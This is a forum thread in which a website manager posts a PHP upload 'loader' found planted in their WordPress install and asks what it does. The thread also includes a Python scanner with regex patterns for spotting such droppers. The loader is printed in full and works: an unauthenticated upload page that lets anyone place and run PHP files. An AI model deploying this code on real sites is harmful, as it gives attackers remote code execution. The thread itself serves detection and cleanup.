php code embedded in wordpress site

dm61
New php-forum User
Posts: 2
Joined: Sun Nov 18, 2018 6:02 pm

Sun Nov 18, 2018 6:10 pm

I am not a php coder. I manage a website and found the following code in a file named wp-admine4.php in a folder named flexx that was created a few days ago.

Can anyone interpret this code and tell me what they are trying to do?

<!DOCTYPE html>
<html>
<head>
<meta charset=utf-8>
<title>loader</title>
</head>
<body>
<h1>loader</h1>


<form method="post" enctype="multipart/form-data">
<input type="file" name="filename"><br>
<input type="submit" value="upload"><br>
</form>

<?php
// If the request carried a multipart upload named "filename"...
if (is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
// ...move it out of PHP's temp dir into the current directory, keeping
// whatever file name the client chose (so a .php file stays executable).
move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
$file = $_FILES["filename"]["name"];
// Print a link to the newly dropped file so it can be opened in the browser.
echo '<a href='.$file.'>'.$file.'</a>';
} else {
// No upload in this request: just show the form above.
echo("FILE");
}

?>
</body>
</html>

hyper
php-forum Fan User
Posts: 761
Joined: Mon Feb 22, 2016 5:52 pm

Mon Nov 19, 2018 1:27 pm

I don't know anything about WordPress, but that looks like a dangerous piece of code to me. It gives a user the ability to upload a file and execute it, doing whatever they want. Unless the folder is inaccessible, there is no signing in: just put the address in your web browser and hijack.

I would change the filename to something else and see what breaks while you conduct some more research on it. I certainly wouldn't allow it on any site of mine without major modification; regardless of how well regarded (or not) WordPress is, that is a dangerous file to have on your site.
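Added example (not part of the thread, and not WordPress code): a small triage script that finds files like the one posted above. It walks a WordPress install, flags PHP files that accept uploads or call execution primitives without any WordPress capability or nonce check, and additionally flags any PHP file under wp-content/uploads, where WordPress only ever stores media. The directory layout, the benign plugin and the "authenticated importer" file are constructed for the demo; the loader text is the PHP from the original post. The regexes are heuristics, not a malware signature, so treat hits as things to read, not as proof.

```python
import re
import tempfile
from pathlib import Path

# Primitives that make an unexpected PHP file worth reading.
UPLOAD_RE = re.compile(r"\b(?:move_uploaded_file|is_uploaded_file)\s*\(")
# move_uploaded_file(...) whose destination is the client-supplied $_FILES[...]["name"].
CLIENT_NAME_RE = re.compile(
    r"move_uploaded_file\s*\([^;]*?\$_FILES\s*\[[^\]]+\]\s*\[\s*['\"]name['\"]\s*\]"
)
EXEC_RE = re.compile(
    r"\b(?:eval|system|exec|shell_exec|passthru|popen|proc_open|assert)\s*\("
)
OBFUSCATION_RE = re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
# Real WordPress authorization / CSRF helpers a legitimate handler would call.
AUTH_RE = re.compile(
    r"\b(?:current_user_can|is_user_logged_in|check_admin_referer|"
    r"wp_verify_nonce|check_ajax_referer)\s*\("
)

# The PHP part of the loader quoted in the post, used here as sample input.
LOADER_SAMPLE = r"""<?php
if (is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
$file = $_FILES["filename"]["name"];
echo '<a href='.$file.'>'.$file.'</a>';
} else {
echo("FILE");
}
?>
"""

# Constructed files for the demo (hypothetical, not real plugins).
BENIGN_PLUGIN = "<?php\nadd_action('init', function () { echo 'hello'; });\n"
AUTHED_IMPORTER = (
    "<?php\n"
    "if (!current_user_can('upload_files')) { wp_die('forbidden'); }\n"
    "move_uploaded_file($_FILES['f']['tmp_name'], '/tmp/import.csv');\n"
)


def analyze_php_source(source):
    """Return the reasons a PHP source text looks like a dropper or web shell."""
    reasons = []
    if UPLOAD_RE.search(source):
        reasons.append("accepts multipart file uploads")
        if CLIENT_NAME_RE.search(source):
            reasons.append("saves the upload under the client-supplied name (attacker can choose .php)")
    if EXEC_RE.search(source):
        reasons.append("calls a code/command execution primitive")
    if OBFUSCATION_RE.search(source):
        reasons.append("decodes/inflates a payload at runtime")
    if reasons and not AUTH_RE.search(source):
        reasons.append("no WordPress capability or nonce check before the action")
    return reasons


def scan_wordpress_tree(root):
    """Map relative path -> reasons for every suspicious PHP file under root."""
    root = Path(root)
    hits = {}
    for path in root.rglob("*.php"):
        rel = path.relative_to(root).as_posix()
        reasons = []
        if rel.startswith("wp-content/uploads/"):
            reasons.append("PHP file under wp-content/uploads (media only)")
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        reasons.extend(analyze_php_source(text))
        if reasons:
            hits[rel] = reasons
    return hits


def run_demo():
    """Build the constructed install in a temp dir, scan it, return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        files = {
            "wp-content/uploads/flexx/wp-admine4.php": LOADER_SAMPLE,
            "wp-content/plugins/hello/hello.php": BENIGN_PLUGIN,
            "wp-content/plugins/importer/upload.php": AUTHED_IMPORTER,
        }
        for rel, body in files.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan_wordpress_tree(root)


if __name__ == "__main__":
    for rel, reasons in sorted(run_demo().items()):
        print(rel)
        for reason in reasons:
            print("  -", reason)
```

Run it against a real install with `scan_wordpress_tree("/var/www/html")` and compare the hit list against recent file modification times; the loader above is flagged for four reasons, the capability-checked importer only for accepting uploads, and the plain plugin not at all.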

dm61
New php-forum User
Posts: 2
Joined: Sun Nov 18, 2018 6:02 pm

Tue Nov 20, 2018 8:06 pm

Thank you. I have uninstalled WordPress and deleted the files.
